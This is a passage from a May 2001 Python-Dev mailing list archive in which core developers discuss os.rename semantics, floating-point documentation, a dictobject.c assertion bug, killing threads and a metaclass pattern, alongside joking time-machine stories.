misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf@artcom-gmbh.de  Wed May 23 08:49:13 2001
From: pf@artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip@pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest to add an optional third boolean parameter to 
os.rename called 'replace', which defaults either to TRUE or FALSE, so 
modifying existing apps  will become even less hassle to potential porters.  
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack@oratrix.nl  Wed May 23 12:15:10 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip@pobox.com (Skip Montanaro)  Wed May 23 12:59:45 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
 <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one@home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip@pobox.com (Skip Montanaro)  Wed May 23 13:11:51 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
 <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest to add an optional third boolean
    Peter> parameter to os.rename called 'replace', which defaults either to
    Peter> TRUE or FALSE, so modifying existing apps will become even less
    Peter> hassle to potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic.  This is just not going to be possible.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.

Skip


From guido@digicool.com  Wed May 23 14:19:24 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
 <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 14:32:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
 <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May 23 14:52:02 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:52:02 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200."
 <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com>

> May I suggest to add an optional third boolean parameter to
> os.rename called 'replace', which defaults either to TRUE or FALSE,
> so modifying existing apps will become even less hassle to potential
> porters.

I see no reason to change the API.

In any case, for backwards compatibility, the default would have to be
platform dependent, which strikes me as just as bad as the current
situation.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Wed May 23 15:00:25 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 16:00:25 +0200
Subject: [Python-Dev] Python 2.1.1
Message-ID: <20010523160025.B690@xs4all.nl>

As those of you on python-checkins might have noticed ;) I started checking
in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but
unfortuantely I'm now called away on a suprise emergency meeting, so I'm not
sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now,
I'll fix that today in any case, but after the meeting.

(As for why I started doing it: I just spent about two weeks of digging
through Pine sourcecode, and its imap server in particular, and I decided I
deserved a break -- Python reads like a Heinlein novel, after pine code:
readable, straight-forward, and just enough complexity to keep it
entertaining :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From aahz@rahul.net  Wed May 23 15:08:45 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 07:08:45 -0700 (PDT)
Subject: [Python-Dev] Killing threads
Message-ID: <20010523140845.B092299C83@waltz.rahul.net>

Okay, so we all know it isn't possible to kill threads cleanly and
safely in any kind of cross-platform way.  At the same time, a program
that has a thread running haywire should be able to kill itself
completely, so that a monitoring process can restart it.  How hard would
it be to do only that in a cross-platform way?

I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
clue what would need to happen for Windows and Mac.

(This got brought up because I experimented with os._exit() as a
possible solution, but that GPFs on Win98SE.)
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From thomas.heller@ion-tof.com  Wed May 23 18:28:07 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 19:28:07 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>

[this message has also been posted to comp.lang.python]
Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.

>From demo/metaclasses/index.html:

class C(B):
    a = 1
    b = 2

Assuming B has a __class__ attribute, this translates into:

C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Usually B is an instance of a normal class.
So the above code will create an instance of B,
call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
and assign the instance of B to the variable C.

I've ever since played with this metaclass hook, and
always found the problem that B would have to completely
simulate the normal python behaviour for classes (modifying
of course what you want to change).

The problem is that there are a lot of successful and
unsucessful attribute lookups, which require a lot
of overhead when implemented in Python: So the result
is very slow (too slow to be usable in some cases).

------

Python 2.1 allows to attach attributes to function objects,
so a new metaclass pattern can be implemented.

The idea is to let B be a function having a __class__ attribute
(which does _not_ have to be a class, it can again be a function).

What is the improvement?
Classes, when called, create new instances of themselves,
functions can return whatever they want.

I've used this pattern to realize the ideas Costas Menico
described in an article 'Simulating class' in c.l.p,
and James Althoff improved in a followup.

The proposal was to create class methods the following way:

<--- start of code --->
class Class1MetaClass: # Base for metaclass
    
    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    # define Class1 & its "instance methods"

    class Class1: # Base class

        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass() # Make & name the singleton metaclass
instance
Class1 = Class1Meta.Class1     # Make the Class1 name accessible

# define subclasses:
class Class2MetaClass(Class1MetaClass):
    [rest of code omitted]

# use them:

Class1Meta.whoami() # invoke "class method" of base class
Class1().whoami()   # make an instance & invoke "instance method"
i = Class1Meta()    # make another instance...
i.whoami()          # ...invoke "instance method"
<--- end of code --->

I find this idea very interesting, but you have
to be very verbose: Define a Class1MetaClass, create
an instance to use as the metaclass, remeber to use
Class1MetaClass (and not! Class2Meta) to define
subclasses.

------

I would like (and have implemented) the following way
to create class methods. You have to supply the magic
MetaMixin object as the first object in the base class list.

class SpamClass(MetaMixin):
    # define "class methods"
    def whoami(self):
        print "SpamClass.whoami:", self

    def create(self, arg1, arg2):
        # a factory class method
        return self._instance(arg1, arg2)

    class _instance_:
        # define "instance methods"
        def whoami(self):
            print "instance.whoami:", self

# Subclassing goes this way:

class FooClass(MetaMixin, SpamClass):
    def create(self, arg1, arg2):
        # override the factory method
        return self._instance_(arg2, arg1)

    class _instance_(SpamClass._instance_):
        # define "instance methods"
        def blah(self):
            print "blah:", self
            self.whoami()

# Test them:

print SpamClass
#prints: <test.SpamClass instance at 007C0D84>

SpamClass.whoami()
#prints: SpamClass.whoami: <test.SpamClass instance at 007C0D84>

s = SpamClass()
print s
#prints: <__main__.SpamClass_Instance instance at 007C0DAC>

s.whoami()
#prints: instance.whoami: <__main__.SpamClass_Instance instance at
007C0DAC>

------

Here is finally the code for MetaMixin:

<--- start code --->
def MagicObject(name, bases, dict):
    import types, new
    l = []
    for b in bases:
        if type(b) == types.FunctionType:
            # we will see our MetaMixin function here,
            # but this cannot be used in bases
            continue
        if type(b) == types.InstanceType:
            # 
            l.append(b.__class__)
        else:
            l.append(b)
    bases = tuple(l)

    # define a new class
    Class = new.classobj(name, bases, dict)

    # create an instance of this class
    # without calling it's __init__ method
    class_instance = new.instance(Class, {})

    # new protocol for initializing
    try:
        class_instance.__init_class__
    except:
        pass
    else:
        class_instance.__init_class__()

    Instance = new.classobj("%s_Instance" % name, \
                              Class._instance_.__bases__, \
                              Class._instance_.__dict__)
    
    Instance.__dict__['__meta__'] = class_instance
    Class._instance_ = Instance
    
    return class_instance

def MetaMixin():
    pass
MetaMixin.__class__ = MagicObject

<--- end code --->


Comments?

Thomas


From guido@digicool.com  Wed May 23 19:02:06 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
 <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>
 <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> >From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, which is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html

> I've ever since played with this metaclass hook, and
> always found the problem that B would have to completely
> simulate the normal python behaviour for classes (modifying
> of course what you want to change).
> 
> The problem is that there are a lot of successful and
> unsucessful attribute lookups, which require a lot
> of overhead when implemented in Python: So the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    ...

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).

> ------
> 
> Python 2.1 allows to attach attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May 23 19:40:58 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as Avantgo Channel.

Here's the URL for adding the channel:
http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May 23 19:57:28 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class.
because B.__class__, which is the (meta)class itself,
is called, and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return aninstance_of_a_class

def B_Meta(): pass
B_Meta.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one@home.com  Wed May 23 20:32:59 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bufixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortuantely I'm
> now called away on a suprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas@python.ca  Wed May 23 20:41:14 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one@home.com  Wed May 23 20:45:06 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).


From thomas@xs4all.net  Wed May 23 21:27:51 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Wed May 23 21:32:04 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).


From barry@digicool.com  Wed May 23 21:52:22 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
 <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
 <20010523124114.A4747@glacier.fnational.com>
 <20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one@home.com  Wed May 23 22:02:17 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr@thyrsus.com  Wed May 23 23:39:49 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward@python.net  Thu May 24 00:48:10 2001
From: gward@python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
